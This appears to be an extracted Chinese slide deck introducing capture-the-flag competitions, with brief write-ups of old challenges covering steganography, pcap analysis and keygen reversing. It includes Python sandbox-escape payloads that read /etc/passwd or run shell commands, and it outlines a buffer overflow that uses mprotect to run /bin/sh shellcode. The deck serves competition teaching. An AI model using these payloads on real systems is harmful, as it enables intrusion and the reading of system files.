CTF介绍 hellok@blue-lotus 

CTF • Capture the flag • http://ctftime.org/ • http://repo.shell-storm.org/CTF/ 

比赛模式 • 主要有2种模式: attack/defense jeopardy. • attack/defense：攻击与防御 每个team给定一个网络。通过VPN连接起来。相互 攻击和防御 jeopardy：给定限定数量的题目 

attack/defense 

时间线 

attack/defense 服务器定时向服务发送正常报文，需要保证正常工作。+1 防御分 向别人的服务器发动攻击 成功攻击+1攻击分 

No content

RuCTFe 2012 Geotracker write up 

POC 

jeopardy • 主要题型 • binary • exploit • forensic • web • crypto • misc(Grag bag) 

• 后面的分数表示题目 的分数 • 题目由赛委会决定开 启顺序或者由最先做 出的开出下一道题目 

forensic 信息隐藏题目 

No content

No content

No content

DE9H 

Crypto 

循环解密,替换 

phdays Forensics 400 

No content

No content

No content

F100 7F454C46010000000000000000004305020003001A0043051A0043050 4000000B931004305B220CD80252000010093CD80303034333035423 2323043443830323532303030303130303933434438300A 

from PIL import Image # Open the image in read mode im = Image.open('.png', 'r') # pixels is an object which allows access to # individual pixels pixels = im.load() # Get the size of the picture width, height = im.size binary_ans = '' for y in xrange(height): # Iterate through each pixel for x in xrange(width): #pixels[x, y] returns a tuple with RGB vals red_pix = pixels[x, y][0] green_pix = pixels[x, y][1] blue_pix = pixels[x, y][2] #print pixels[x, y] if red_pix == 255: binary_ans += '1' elif red_pix == 254: binary_ans += '0' if green_pix == 255: binary_ans += '1' elif green_pix == 254: binary_ans += '0' if blue_pix == 255: binary_ans += '1' elif blue_pix == 254: binary_ans += '0' # This just converts the binary to ASCII answer = '' for i in xrange(len(binary_ans)/8): answer += chr(int(binary_ans[i*8:i*8+8], 2)) f=open('answer.txt','w') f.write(answer) f.close() #print answer 

PWN • PWN400 PHDAYS • python sandbox 逃逸 

• python反编译后 

老版本的sandbox 

().__class__.__bases__ ().__class__.__bases__[0].__subclasses__()[40]("./key").read() 

• Reader.func_closure[0].cell_contents.func_closure[0].cel l_contents('/etc/passwd').read() • Reader.func_globals['sys'].modules['os'].system(“cat /etc/passwd”) • Reader.func_closure[0].cell_contents.func_globals['ALL OWED_FILES'].append(‘/etc/passwd’) 

29c3-ctf-exploitation-200-ru1337 • 32位ELF（常常为64位） • $ nc 94.45.252.242 1024 • ID&PASSWORD 1337NESS EVALUATION • Please enter your username and password • User: aaaaaaaaaaaaaaa • Password: bbbbbbbbbbbbbbbbbbbb • u r not s0 1337zz!!! 

No content

No content

我们要做的： 1.缓冲区溢出到ret 2.利用mprotect让我们的缓冲区有可执行权限 3.跳到缓冲区里面 4.执行shellcode（/bin/sh /bin/cat flag） 

hack_u_too bin500 writeup • 包含简单的反调试器，算法逆向 • 1.anti调试器。通过简单的补丁等可绕过 • 2.KEY生成分为3部分,类似注册机 

得出： arg1 length 7 arg2 length 23 

得出参数1和参数2个映射关系，和参数2 的前4个字母。 其中4个变量关系如下： v13|v14=0×77 v13^v14=0×46 v14^v15=0×45 v15^v16=0x1c v15|v15=0x7c 最终有2组解v13v14v15v16组成字符串为： w1th或s5pl 

k0hyacu fr0m_hacky0u_w1th_l0v3~ 

net100 • Find the secret link in this conversation • strings epicark100.pcap | grep -i key • message=some%20shit%20happend%20%20this%20su nday.%20i%20have%20downloaded • %20this%20(key- http%3A%2F%2Ftinyurl.com%2F9qj5r4r)&to=%23hacku • message=oh%2C%20sry.%20key%20is%20tinyurl.com %2F8pdox5a&to=%23hacku • mPOST /safebrowsing/downloads?client=navclient- autoffox&appver=15.0.1&pver=2.2&wrkey=AKEgNiuG_3 JPr9B41IQNypI7EAVw8oaCQtVJYpdMOG • gLKkFvOQVQtyEW3U9c28TOgCy1vXiYXUF7xQ8ssxtcl OypciYrG9RAdg== HTTP/1.1 

net200 • What's the md5 of the file being transferred? • 从流中提取文件，计算MD5值 • 各种自定义协议，需要自己解包 复杂 

drink beer challenge 

http://ctftime.org/event/list/upcoming/ 

http://ctftime.org/writeups/